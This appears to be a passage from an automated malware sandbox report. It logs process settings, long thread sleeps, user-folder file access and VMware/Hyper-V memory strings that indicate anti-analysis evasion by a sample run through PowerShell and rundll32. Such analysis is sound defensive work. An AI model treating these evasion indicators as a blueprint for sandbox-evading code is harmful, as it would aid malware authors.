    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8100Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1584Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8273
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1397
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7035
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1337
    Source: C:\Windows\System32\loaddll64.exe TID: 3320Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep count: 8100 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 1584 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep time: -8301034833169293s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -9223372036854770s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 7035 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 1337 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
    Source: rundll32.exe, 0000000E.00000002.2036889929.000001C667138000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
    Source: rundll32.exe, 0000000E.00000002.2036889929.000001C6671F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F
    Source: netsh.exe, 00000006.00000003.1720876067.0000026775525000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\d
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A82C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1957547430.000001EB5A7A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1957191007.0000019A2B0A1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2036889929.000001C6671AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2036889929.000001C6671EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A82C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRsE
    Source: rundll32.exe, 00000004.00000002.1957191007.0000019A2AFE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj
    Source: rundll32.exe, 00000004.00000002.1957191007.0000019A2B0A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~
    Source: rundll32.exe, 0000000E.00000002.2036889929.000001C6671F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
    Source: netsh.exe, 00000005.00000003.1720943446.00000251F77E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllccz
    Source: netsh.exe, 00000010.00000003.1789527713.000001D3EACF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
